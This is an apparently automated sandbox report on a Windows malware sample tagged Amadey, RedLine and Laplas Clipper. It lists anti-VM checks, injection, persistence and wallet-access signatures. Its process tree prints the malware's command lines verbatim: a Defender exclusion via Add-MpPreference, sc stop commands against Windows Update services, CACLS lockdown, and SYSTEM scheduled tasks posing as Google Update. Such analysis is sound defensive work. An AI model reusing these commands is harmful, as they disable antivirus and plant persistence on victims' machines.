Malware Analysis Report

2024-10-19 01:10

Sample ID 230729-fgaghsbf5w
Target 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
Tags
amadey laplas redline clipper evasion infostealer persistence spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847

Threat Level: Known bad

The file 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847 was found to be: Known bad.

Malicious Activity Summary

amadey laplas redline clipper evasion infostealer persistence spyware stealer themida trojan

RedLine payload

Amadey

Laplas Clipper

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Checks BIOS information in registry

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

GoLang User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-29 04:50

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-29 04:50

Reported

2023-07-29 04:55

Platform

win7-20230712-en

Max time kernel

185s

Max time network

303s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Program Files\Google\Chrome\updater.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1648 set thread context of 1976 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3036 set thread context of 2424 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 3036 set thread context of 1364 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60b1dd54d8c1d901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2764 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2764 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2764 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2764 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2764 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2764 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 2764 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 2764 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 2764 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 2764 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 2764 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 2764 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 2764 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 2764 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 2764 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 2764 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 2764 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1900 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 1060 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1900 wrote to memory of 1060 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1900 wrote to memory of 1060 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1900 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 2280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 2280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 2280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {E3AF431A-CB8C-4FC7-96DD-748EC797B6AA} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {8B9E8347-A8FA-422B-BBD1-6FFAE0BE7D22} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

